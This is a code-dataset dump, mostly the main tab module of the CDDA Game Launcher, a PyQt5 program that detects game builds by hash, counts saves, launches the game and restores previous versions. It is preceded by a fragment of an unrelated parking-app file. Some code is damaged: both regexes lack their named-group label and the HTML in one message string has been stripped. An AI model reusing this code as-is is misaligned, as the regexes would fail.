[[[box[0],box[1]],[box[2],box[1]],[box[2],box[3]],[box[0],box[3]]]], dtype=np.int32 )\n polyImage = self.currFrame.copy()\n cv2.fillPoly(polyImage, verticies, 255)\n image = cv2.addWeighted(polyImage, 0.3, self.currFrame, 0.7, 0.0)\n cv2.imwrite(\"../footage/blueSelection.jpg\", image)\n return image\n return []\n #Cross reference inputID with stored IDs\n\n #Highlight location of ID car on the inputImg\n\n #Return highlighted image to broker\n","repo_name":"vyommalhotra/parksimply","sub_path":"extractor/src/cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":9952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6856161016","text":"import hashlib\nimport html\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport stat\nimport subprocess\nimport sys\nimport tempfile\nimport zipfile\nimport random\n\nfrom collections import deque\nfrom datetime import datetime, timedelta\nfrom io import BytesIO, TextIOWrapper\nfrom os import scandir\nfrom pathlib import Path\nfrom urllib.parse import urljoin\n\nimport arrow\nfrom PyQt5.QtCore import (\n Qt, QTimer, QUrl, QFileInfo, pyqtSignal, QStringListModel, QThread, QRegularExpression\n)\nfrom PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest\nfrom PyQt5.QtWidgets import (\n QApplication, QWidget, QGridLayout, QGroupBox, QVBoxLayout, QLabel, QLineEdit,\n QPushButton, QFileDialog, QToolButton, QProgressBar, QButtonGroup, QRadioButton,\n QComboBox, QTextBrowser, QMessageBox, QStyle, QHBoxLayout, QSizePolicy\n)\nfrom PyQt5.QtGui import QRegularExpressionValidator\nfrom babel.dates import format_datetime\nfrom pywintypes import error as PyWinError\n\nimport cddagl.constants as cons\nfrom cddagl.constants import get_cddagl_path, get_cdda_uld_path\nfrom cddagl import __version__ as version\nfrom cddagl.functions import (\n tryint, move_path, is_64_windows, sizeof_fmt, delete_path,\n clean_qt_path, unique, log_exception, ensure_slash, safe_humanize\n)\nfrom cddagl.i18n import proxy_ngettext as ngettext, proxy_gettext as _\nfrom cddagl.sql.functions import (\n get_config_value, set_config_value, new_version, get_build_from_sha256,\n new_build, config_true\n)\nfrom cddagl.win32 import (\n find_process_with_file_handle, activate_window, process_id_from_path, wait_for_pid,\n get_documents_directory\n)\n\nlogger = logging.getLogger('cddagl')\n\n\nclass MainTab(QWidget):\n def __init__(self):\n super(MainTab, self).__init__()\n\n game_dir_group_box = GameDirGroupBox()\n self.game_dir_group_box = game_dir_group_box\n\n update_group_box = UpdateGroupBox()\n self.update_group_box = update_group_box\n\n layout = QVBoxLayout()\n layout.addWidget(game_dir_group_box)\n layout.addWidget(update_group_box)\n self.setLayout(layout)\n\n def set_text(self):\n self.game_dir_group_box.set_text()\n self.update_group_box.set_text()\n\n def get_main_window(self):\n return self.parentWidget().parentWidget().parentWidget()\n\n def get_settings_tab(self):\n return self.parentWidget().parentWidget().settings_tab\n\n def get_soundpacks_tab(self):\n return self.parentWidget().parentWidget().soundpacks_tab\n\n def get_mods_tab(self):\n return self.parentWidget().parentWidget().mods_tab\n\n def get_backups_tab(self):\n return self.parentWidget().parentWidget().backups_tab\n\n def disable_tab(self):\n self.game_dir_group_box.disable_controls()\n self.update_group_box.disable_controls(True)\n\n def enable_tab(self):\n self.game_dir_group_box.enable_controls()\n self.update_group_box.enable_controls()\n\n\nclass GameDirGroupBox(QGroupBox):\n def __init__(self):\n super(GameDirGroupBox, self).__init__()\n\n self.shown = False\n self.exe_path = None\n self.restored_previous = False\n self.current_build = None\n\n self.exe_reading_timer = None\n self.update_saves_timer = None\n self.saves_size = 0\n\n self.dir_combo_inserting = False\n\n self.game_process = None\n self.game_process_id = None\n self.game_started = False\n\n layout = QGridLayout()\n\n dir_label = QLabel()\n layout.addWidget(dir_label, 0, 0, Qt.AlignRight)\n self.dir_label = dir_label\n\n self.layout_dir = QHBoxLayout()\n layout.addLayout(self.layout_dir, 0, 1)\n\n self.dir_combo = QComboBox()\n self.layout_dir.addWidget(self.dir_combo)\n self.dir_combo.setEditable(True)\n self.dir_combo.setInsertPolicy(QComboBox.InsertAtTop)\n self.dir_combo.currentIndexChanged.connect(self.dc_index_changed)\n self.dir_combo.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)\n game_directories = json.loads(get_config_value('game_directories', '[]'))\n self.dir_combo_model = QStringListModel(game_directories, self)\n self.dir_combo.setModel(self.dir_combo_model)\n\n dir_change_button = QToolButton()\n self.layout_dir.addWidget(dir_change_button)\n dir_change_button.setText('...')\n dir_change_button.clicked.connect(self.set_game_directory)\n self.dir_change_button = dir_change_button\n\n self.dir_state_icon = QLabel()\n self.layout_dir.addWidget(self.dir_state_icon)\n self.dir_state_icon.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self.dir_state_icon.hide()\n\n version_label = QLabel()\n layout.addWidget(version_label, 1, 0, Qt.AlignRight)\n self.version_label = version_label\n\n version_value_label = QLineEdit()\n version_value_label.setReadOnly(True)\n layout.addWidget(version_value_label, 1, 1)\n self.version_value_label = version_value_label\n\n build_label = QLabel()\n layout.addWidget(build_label, 2, 0, Qt.AlignRight)\n self.build_label = build_label\n\n build_value_label = QLineEdit()\n build_value_label.setReadOnly(True)\n build_value_label.setText(_('Unknown'))\n layout.addWidget(build_value_label, 2, 1)\n self.build_value_label = build_value_label\n\n saves_label = QLabel()\n layout.addWidget(saves_label, 3, 0, Qt.AlignRight)\n self.saves_label = saves_label\n\n saves_value_edit = QLineEdit()\n saves_value_edit.setReadOnly(True)\n saves_value_edit.setText(_('Unknown'))\n layout.addWidget(saves_value_edit, 3, 1)\n self.saves_value_edit = saves_value_edit\n\n saves_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n saves_warning_label.setPixmap(icon.pixmap(16, 16))\n saves_warning_label.hide()\n layout.addWidget(saves_warning_label, 3, 2)\n self.saves_warning_label = saves_warning_label\n\n buttons_container = QWidget()\n buttons_layout = QGridLayout()\n buttons_layout.setContentsMargins(0, 0, 0, 0)\n buttons_container.setLayout(buttons_layout)\n\n launch_game_button = QPushButton()\n launch_game_button.setEnabled(False)\n launch_game_button.setStyleSheet(\"font-size: 20px;\")\n launch_game_button.clicked.connect(self.launch_game)\n buttons_layout.addWidget(launch_game_button, 0, 0, 1, 3)\n self.launch_game_button = launch_game_button\n\n restore_button = QPushButton()\n restore_button.setEnabled(False)\n restore_button.clicked.connect(self.restore_previous)\n buttons_layout.addWidget(restore_button, 0, 3, 1, 1)\n self.restore_button = restore_button\n\n layout.addWidget(buttons_container, 4, 0, 1, 3)\n self.buttons_container = buttons_container\n self.buttons_layout = buttons_layout\n\n self.setLayout(layout)\n self.set_text()\n\n def set_text(self):\n self.dir_label.setText(_('Directory:'))\n self.version_label.setText(_('Version:'))\n self.build_label.setText(_('Build:'))\n self.saves_label.setText(_('Saves:'))\n self.saves_warning_label.setToolTip(\n _('Your save directory might be large '\n 'enough to cause significant delays during the update process.\\n'\n 'You might want to enable the \"Do not copy or move the save '\n 'directory\" option in the settings tab.'))\n self.launch_game_button.setText(_('Launch game'))\n self.restore_button.setText(_('Restore previous version'))\n self.setTitle(_('Game'))\n\n def set_dir_state_icon(self, state):\n style = QApplication.style()\n if state == 'critical':\n icon = style.standardIcon(QStyle.SP_MessageBoxCritical).pixmap(16, 16)\n elif state == 'warning':\n icon = style.standardIcon(QStyle.SP_MessageBoxWarning).pixmap(16, 16)\n elif state == 'ok':\n icon = style.standardIcon(QStyle.SP_DialogApplyButton).pixmap(16, 16)\n elif state == 'hide':\n self.dir_state_icon.hide()\n return\n\n self.dir_state_icon.setPixmap(icon)\n self.dir_state_icon.show()\n\n def showEvent(self, event):\n if not self.shown:\n self.shown = True\n\n self.last_game_directory = None\n\n game_directory = get_config_value('game_directory')\n if game_directory is None:\n documents_path = get_documents_directory()\n default_dir = os.path.join(documents_path, 'cdda')\n game_directory = default_dir\n\n self.set_dir_combo_value(game_directory)\n\n self.game_directory_changed()\n\n self.shown = True\n\n def set_dir_combo_value(self, value):\n dir_model = self.dir_combo.model()\n\n index_list = dir_model.match(dir_model.index(0, 0), Qt.DisplayRole,\n value, 1, Qt.MatchFixedString)\n if len(index_list) > 0:\n self.dir_combo.setCurrentIndex(index_list[0].row())\n else:\n self.dir_combo_inserting = True\n self.dir_combo.insertItem(0, value)\n self.dir_combo_inserting = False\n\n self.dir_combo.setCurrentIndex(0)\n\n def disable_controls(self):\n self.dir_combo.setEnabled(False)\n self.dir_change_button.setEnabled(False)\n\n self.launch_game_button.setEnabled(False)\n self.restore_button.setEnabled(False)\n\n def enable_controls(self):\n self.dir_combo.setEnabled(True)\n self.dir_change_button.setEnabled(True)\n\n self.launch_game_button.setEnabled(\n self.exe_path is not None and os.path.isfile(self.exe_path))\n\n directory = self.dir_combo.currentText()\n previous_version_dir = os.path.join(directory, 'previous_version')\n self.restore_button.setEnabled(os.path.isdir(previous_version_dir))\n\n def restore_previous(self):\n self.disable_controls()\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n update_group_box.disable_controls(True)\n\n self.restored_previous = False\n\n try:\n game_dir = self.dir_combo.currentText()\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n\n if os.path.isdir(previous_version_dir) and os.path.isdir(game_dir):\n\n with tempfile.TemporaryDirectory(prefix=cons.TEMP_PREFIX\n ) as temp_move_dir:\n\n excluded_entries = set(['previous_version'])\n if config_true(get_config_value('prevent_save_move',\n 'False')):\n excluded_entries.add('save')\n\n # Prevent moving the launcher if it's in the game directory\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n excluded_entries.add(os.path.basename(launcher_exe))\n\n for entry in os.listdir(game_dir):\n if entry not in excluded_entries:\n entry_path = os.path.join(game_dir, entry)\n shutil.move(entry_path, temp_move_dir)\n\n excluded_entries = set()\n if config_true(get_config_value('prevent_save_move', 'False')):\n excluded_entries.add('save')\n for entry in os.listdir(previous_version_dir):\n if entry not in excluded_entries:\n entry_path = os.path.join(previous_version_dir, entry)\n shutil.move(entry_path, game_dir)\n\n for entry in os.listdir(temp_move_dir):\n entry_path = os.path.join(temp_move_dir, entry)\n shutil.move(entry_path, previous_version_dir)\n\n self.restored_previous = True\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(str(e))\n\n self.last_game_directory = None\n self.enable_controls()\n update_group_box.enable_controls()\n self.game_directory_changed()\n\n def focus_game(self):\n if self.game_process is None and self.game_process_id is None:\n return\n\n if self.game_process is not None:\n pid = self.game_process.pid\n elif self.game_process_id is not None:\n pid = self.game_process_id\n\n try:\n activate_window(pid)\n except (OSError, PyWinError):\n # Can't activate window, we will assume that the game ended\n self.game_ended()\n\n def launch_game(self):\n if self.game_started:\n return self.focus_game()\n\n if config_true(get_config_value('backup_on_launch', 'False')):\n main_tab = self.get_main_tab()\n backups_tab = main_tab.get_backups_tab()\n\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('before_launch'))\n\n backups_tab.after_backup = self.launch_game_process\n backups_tab.backup_saves(name)\n else:\n self.launch_game_process()\n\n def launch_game_process(self):\n if self.exe_path is None or not os.path.isfile(self.exe_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game executable not found'))\n\n self.launch_game_button.setEnabled(False)\n return\n\n self.get_main_window().setWindowState(Qt.WindowMinimized)\n exe_dir = os.path.dirname(self.exe_path)\n\n params = get_config_value('command.params', '').strip()\n if params != '':\n params = ' ' + params\n\n cmd = '\"{exe_path}\"{params}'.format(exe_path=self.exe_path,\n params=params)\n\n try:\n game_process = subprocess.Popen(cmd, cwd=exe_dir,\n creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Could not launch the game executable'))\n\n error_msgbox = QMessageBox()\n error_msgbox.setWindowTitle(_('Cannot launch game'))\n\n text = _('''\n

    The launcher failed to start the game executable in {filename} .

    \n

    It received the following error from the operating system: {error}

    \n

    Poor antivirus products are known to detect the game binary as a threat and\nblock its execution. A simple workaround is to add the game binary in your\nantivirus whitelist or select the action to trust this binary when detected.

    \n''').format(\n filename=html.escape(e.filename or _('[unknown]')),\n error=html.escape(e.strerror))\n\n error_msgbox.setText(text)\n error_msgbox.addButton(_('OK'), QMessageBox.YesRole)\n error_msgbox.setIcon(QMessageBox.Critical)\n\n error_msgbox.exec()\n return\n\n self.game_process = game_process\n self.game_started = True\n\n if not config_true(get_config_value('keep_launcher_open', 'False')):\n self.get_main_window().close()\n else:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game process is running'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n self.disable_controls()\n update_group_box.disable_controls(True)\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n self.launch_game_button.setText(_('Show current game'))\n self.launch_game_button.setEnabled(True)\n\n class ProcessWaitThread(QThread):\n ended = pyqtSignal()\n\n def __init__(self, process):\n super(ProcessWaitThread, self).__init__()\n\n self.process = process\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.process.wait()\n self.ended.emit()\n\n def process_ended():\n self.game_ended()\n\n process_wait_thread = ProcessWaitThread(self.game_process)\n process_wait_thread.ended.connect(process_ended)\n process_wait_thread.start()\n\n self.process_wait_thread = process_wait_thread\n\n def game_ended(self):\n if self.process_wait_thread is not None:\n self.process_wait_thread.quit()\n self.process_wait_thread = None\n\n self.game_process = None\n self.game_started = False\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Game process has ended'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n self.enable_controls()\n update_group_box.enable_controls()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n self.launch_game_button.setText(_('Launch game'))\n\n self.get_main_window().setWindowState(Qt.WindowActive)\n\n self.update_saves()\n\n if config_true(get_config_value('backup_on_end', 'False')):\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('after_end'))\n\n backups_tab.backup_saves(name)\n\n def get_main_tab(self):\n return self.parentWidget()\n\n def get_main_window(self):\n return self.get_main_tab().get_main_window()\n\n def update_soundpacks(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n soundpacks_tab = central_widget.soundpacks_tab\n\n directory = self.dir_combo.currentText()\n soundpacks_tab.game_dir_changed(directory)\n\n def update_mods(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n mods_tab = central_widget.mods_tab\n\n directory = self.dir_combo.currentText()\n mods_tab.game_dir_changed(directory)\n\n def update_backups(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n backups_tab = central_widget.backups_tab\n\n directory = self.dir_combo.currentText()\n backups_tab.game_dir_changed(directory)\n\n def clear_soundpacks(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n soundpacks_tab = central_widget.soundpacks_tab\n\n soundpacks_tab.clear_soundpacks()\n\n def clear_mods(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n mods_tab = central_widget.mods_tab\n\n mods_tab.clear_mods()\n\n def clear_backups(self):\n main_window = self.get_main_window()\n central_widget = main_window.central_widget\n backups_tab = central_widget.backups_tab\n\n backups_tab.clear_backups()\n\n def set_game_directory(self):\n options = QFileDialog.DontResolveSymlinks | QFileDialog.ShowDirsOnly\n directory = QFileDialog.getExistingDirectory(self,\n _('Game directory'), self.dir_combo.currentText(),\n options=options)\n if directory:\n self.set_dir_combo_value(clean_qt_path(directory))\n\n def dc_index_changed(self, index):\n if self.shown and not self.dir_combo_inserting:\n self.game_directory_changed()\n\n def game_directory_changed(self):\n directory = self.dir_combo.currentText()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n self.set_dir_state_icon('hide')\n\n self.exe_path = None\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n dir_state = None\n if ensure_slash(get_cddagl_path()).startswith(ensure_slash(directory)):\n dir_state = 'critical'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _('CDDA Game Launcher files cannot be inside Game directory!')\n )\n elif os.path.isfile(directory):\n dir_state = 'critical'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _('Game directory was set to a file!')\n )\n elif not os.path.isdir(directory):\n dir_state = 'warning'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _(\"Game directory doesn't exist, Game is not installed here.\")\n )\n else:\n # Check for previous version\n previous_version_dir = os.path.join(directory, 'previous_version')\n self.restore_button.setEnabled(os.path.isdir(previous_version_dir))\n\n # Find the executable\n console_exe = os.path.join(directory, 'cataclysm.exe')\n tiles_exe = os.path.join(directory, 'cataclysm-tiles.exe')\n\n exe_path = None\n version_type = None\n if os.path.isfile(console_exe):\n version_type = _('console')\n exe_path = console_exe\n elif os.path.isfile(tiles_exe):\n version_type = _('tiles')\n exe_path = tiles_exe\n\n if version_type is None:\n dir_state = 'warning'\n self.set_dir_state_icon(dir_state)\n self.version_value_label.setText(\n _('Unknown version - Reason:') + ' ' +\n _(\"Game is not installed in this directory.\")\n )\n else:\n dir_state = 'ok'\n self.exe_path = exe_path\n self.version_type = version_type\n if self.last_game_directory != directory:\n self.version_value_label.setText(_('Analyzing...'))\n self.build_value_label.setText(_('Analyzing...'))\n self.saves_value_edit.setText(_('Analyzing...'))\n self.update_version()\n self.update_saves()\n self.update_soundpacks()\n self.update_mods()\n self.update_backups()\n\n if self.exe_path is None:\n self.launch_game_button.setEnabled(False)\n update_group_box.update_button.setText(_('Install game'))\n update_group_box.update_button.setEnabled(dir_state != 'critical')\n\n self.restored_previous = False\n\n self.current_build = None\n self.build_value_label.setText(_('Unknown'))\n self.saves_value_edit.setText(_('Unknown'))\n self.clear_soundpacks()\n self.clear_mods()\n self.clear_backups()\n else:\n self.launch_game_button.setEnabled(True)\n update_group_box.update_button.setText(_('Update game'))\n update_group_box.update_button.setEnabled(dir_state == 'ok')\n\n self.check_running_process(self.exe_path)\n\n self.last_game_directory = directory\n \n set_config_value('game_directory', directory)\n\n @property\n def app_locale(self):\n return QApplication.instance().app_locale\n\n def update_version(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n if (self.exe_reading_timer is not None\n and self.exe_reading_timer.isActive()):\n self.exe_reading_timer.stop()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n status_bar.clearMessage()\n status_bar.busy += 1\n\n reading_label = QLabel()\n reading_label.setText(_('Reading: {0}').format(self.exe_path))\n status_bar.addWidget(reading_label, 100)\n self.reading_label = reading_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.reading_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.exe_reading_timer = timer\n\n exe_size = os.path.getsize(self.exe_path)\n\n progress_bar.setRange(0, exe_size)\n self.exe_total_read = 0\n\n self.exe_sha256 = hashlib.sha256()\n self.game_version = ''\n\n game_dir = self.dir_combo.currentText()\n version_file = os.path.join(game_dir, 'VERSION.txt')\n if os.path.isfile(version_file):\n file_content = None\n with open(version_file, 'r', encoding='utf8') as read_file:\n file_content = read_file.read(1024)\n if file_content is not None:\n match = re.search(r'commit sha: (?P\\S+)', file_content)\n if match:\n commit_sha = match.group('commitsha')\n if len(commit_sha) >= 7:\n self.game_version = commit_sha[:7]\n \n self.opened_exe = open(self.exe_path, 'rb')\n\n def timeout():\n bytes = self.opened_exe.read(cons.READ_BUFFER_SIZE)\n if len(bytes) == 0:\n self.opened_exe.close()\n self.exe_reading_timer.stop()\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n if status_bar.busy == 0 and not self.game_started:\n if self.restored_previous:\n status_bar.showMessage(\n _('Previous version restored'))\n else:\n status_bar.showMessage(_('Ready'))\n\n if status_bar.busy == 0 and self.game_started:\n status_bar.showMessage(_('Game process is running'))\n\n sha256 = self.exe_sha256.hexdigest()\n\n stable_version = cons.STABLE_SHA256.get(sha256, None)\n is_stable = stable_version is not None\n\n if is_stable:\n self.game_version = stable_version\n \n if self.game_version == '':\n self.game_version = _('Unknown')\n else:\n self.add_game_dir()\n\n self.version_value_label.setText(\n '{version} ({type})'\n .format(version=self.game_version, type=self.version_type)\n )\n\n new_version(self.game_version, sha256, is_stable)\n\n build = get_build_from_sha256(sha256)\n\n if build is not None:\n build_date = arrow.get(build['released_on'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(), locale=self.app_locale)\n self.build_value_label.setText(\n '{build} ({time_delta})'\n .format(build=build['build'], time_delta=human_delta)\n )\n self.current_build = build['build']\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n if (update_group_box.builds is not None\n and len(update_group_box.builds) > 0\n and status_bar.busy == 0\n and not self.game_started):\n last_build = update_group_box.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == self.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n\n else:\n self.build_value_label.setText(_('Unknown'))\n self.current_build = None\n\n else:\n self.exe_total_read += len(bytes)\n self.reading_progress_bar.setValue(self.exe_total_read)\n self.exe_sha256.update(bytes)\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def check_running_process(self, exe_path):\n pid = process_id_from_path(exe_path)\n\n if pid is not None:\n self.game_started = True\n self.game_process_id = pid\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n if status_bar.busy == 0:\n status_bar.showMessage(_('Game process is running'))\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n self.disable_controls()\n update_group_box.disable_controls(True)\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n self.launch_game_button.setText(_('Show current game'))\n self.launch_game_button.setEnabled(True)\n\n class ProcessWaitThread(QThread):\n ended = pyqtSignal()\n\n def __init__(self, pid):\n super(ProcessWaitThread, self).__init__()\n\n self.pid = pid\n\n def __del__(self):\n self.wait()\n\n def run(self):\n wait_for_pid(self.pid)\n self.ended.emit()\n\n def process_ended():\n self.process_wait_thread = None\n\n self.game_process_id = None\n self.game_started = False\n\n status_bar.showMessage(_('Game process has ended'))\n\n self.enable_controls()\n update_group_box.enable_controls()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n self.launch_game_button.setText(_('Launch game'))\n\n self.get_main_window().setWindowState(Qt.WindowActive)\n\n self.update_saves()\n\n if config_true(get_config_value('backup_on_end', 'False')):\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('after_end'))\n\n backups_tab.backup_saves(name)\n\n process_wait_thread = ProcessWaitThread(self.game_process_id)\n process_wait_thread.ended.connect(process_ended)\n process_wait_thread.start()\n\n self.process_wait_thread = process_wait_thread\n\n def add_game_dir(self):\n new_game_dir = self.dir_combo.currentText()\n\n game_dirs = json.loads(get_config_value('game_directories', '[]'))\n\n try:\n index = game_dirs.index(new_game_dir)\n if index > 0:\n del game_dirs[index]\n game_dirs.insert(0, new_game_dir)\n except ValueError:\n game_dirs.insert(0, new_game_dir)\n\n if len(game_dirs) > cons.MAX_GAME_DIRECTORIES:\n del game_dirs[cons.MAX_GAME_DIRECTORIES:]\n\n set_config_value('game_directories', json.dumps(game_dirs))\n\n def update_saves(self):\n self.game_dir = self.dir_combo.currentText()\n\n if (self.update_saves_timer is not None and self.update_saves_timer.isActive()):\n self.update_saves_timer.stop()\n self.saves_value_edit.setText(_('Unknown'))\n\n save_dir = os.path.join(self.game_dir, 'save')\n if not os.path.isdir(save_dir):\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters}'\n .format(\n world_count=0,\n character_count=0,\n worlds=ngettext('World', 'Worlds', 0),\n characters=ngettext('Character', 'Characters', 0)\n )\n )\n return\n\n timer = QTimer(self)\n self.update_saves_timer = timer\n\n self.saves_size = 0\n self.saves_worlds = 0\n self.saves_characters = 0\n self.world_dirs = set()\n\n self.saves_scan = scandir(save_dir)\n self.next_scans = []\n self.save_dir = save_dir\n\n def timeout():\n try:\n entry = next(self.saves_scan)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.saves_size += entry.stat().st_size\n\n if entry.name.endswith('.sav'):\n world_dir = os.path.dirname(entry.path)\n if self.save_dir == os.path.dirname(world_dir):\n self.saves_characters += 1\n\n if entry.name in cons.WORLD_FILES:\n world_dir = os.path.dirname(entry.path)\n if (world_dir not in self.world_dirs\n and self.save_dir == os.path.dirname(world_dir)):\n self.world_dirs.add(world_dir)\n self.saves_worlds += 1\n\n worlds_text = ngettext('World', 'Worlds', self.saves_worlds)\n characters_text = ngettext('Character', 'Characters',self.saves_characters)\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters} ({size})'\n .format(\n world_count=self.saves_worlds,\n character_count=self.saves_characters,\n size=sizeof_fmt(self.saves_size),\n worlds=worlds_text,\n characters=characters_text\n )\n )\n except StopIteration:\n if len(self.next_scans) > 0:\n self.saves_scan = scandir(self.next_scans.pop())\n else:\n # End of the tree\n self.update_saves_timer.stop()\n self.update_saves_timer = None\n\n # no more path to scan but still 0 chars/worlds\n if self.saves_worlds == 0 and self.saves_characters == 0:\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters}'\n .format(\n world_count=0,\n character_count=0,\n worlds=ngettext('World', 'Worlds', 0),\n characters=ngettext('Character', 'Characters', 0)\n )\n )\n\n # Warning about saves size\n if (self.saves_size > cons.SAVES_WARNING_SIZE and\n not config_true(get_config_value('prevent_save_move', 'False'))):\n self.saves_warning_label.show()\n else:\n self.saves_warning_label.hide()\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def analyse_new_build(self, build):\n game_dir = self.dir_combo.currentText()\n\n self.previous_exe_path = self.exe_path\n self.exe_path = None\n\n console_exe = os.path.join(game_dir, 'cataclysm.exe')\n tiles_exe = os.path.join(game_dir, 'cataclysm-tiles.exe')\n\n exe_path = None\n version_type = None\n if os.path.isfile(console_exe):\n version_type = _('console')\n exe_path = console_exe\n elif os.path.isfile(tiles_exe):\n version_type = _('tiles')\n exe_path = tiles_exe\n\n if version_type is None:\n self.version_value_label.setText(_('Not a CDDA directory'))\n self.build_value_label.setText(_('Unknown'))\n self.current_build = None\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n update_group_box.finish_updating()\n\n self.launch_game_button.setEnabled(False)\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.showMessage(_('No executable found in the downloaded '\n 'archive. You might want to restore your previous version.'))\n\n else:\n if (self.exe_reading_timer is not None\n and self.exe_reading_timer.isActive()):\n self.exe_reading_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n self.exe_path = exe_path\n self.version_type = version_type\n self.build_number = build['number']\n self.build_date = build['date']\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n reading_label = QLabel()\n reading_label.setText(_('Reading: {0}').format(self.exe_path))\n status_bar.addWidget(reading_label, 100)\n self.reading_label = reading_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.reading_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.exe_reading_timer = timer\n\n exe_size = os.path.getsize(self.exe_path)\n\n progress_bar.setRange(0, exe_size)\n self.exe_total_read = 0\n\n self.exe_sha256 = hashlib.sha256()\n self.game_version = ''\n\n version_file = os.path.join(game_dir, 'VERSION.txt')\n if os.path.isfile(version_file):\n file_content = None\n with open(version_file, 'r', encoding='utf8') as read_file:\n file_content = read_file.read(1024)\n if file_content is not None:\n match = re.search(r'commit sha: (?P\\S+)', file_content)\n if match:\n commit_sha = match.group('commitsha')\n if len(commit_sha) >= 7:\n self.game_version = commit_sha[:7]\n\n self.opened_exe = open(self.exe_path, 'rb')\n\n def timeout():\n bytes = self.opened_exe.read(cons.READ_BUFFER_SIZE)\n if len(bytes) == 0:\n self.opened_exe.close()\n self.exe_reading_timer.stop()\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n build_date = arrow.get(self.build_date, 'UTC')\n 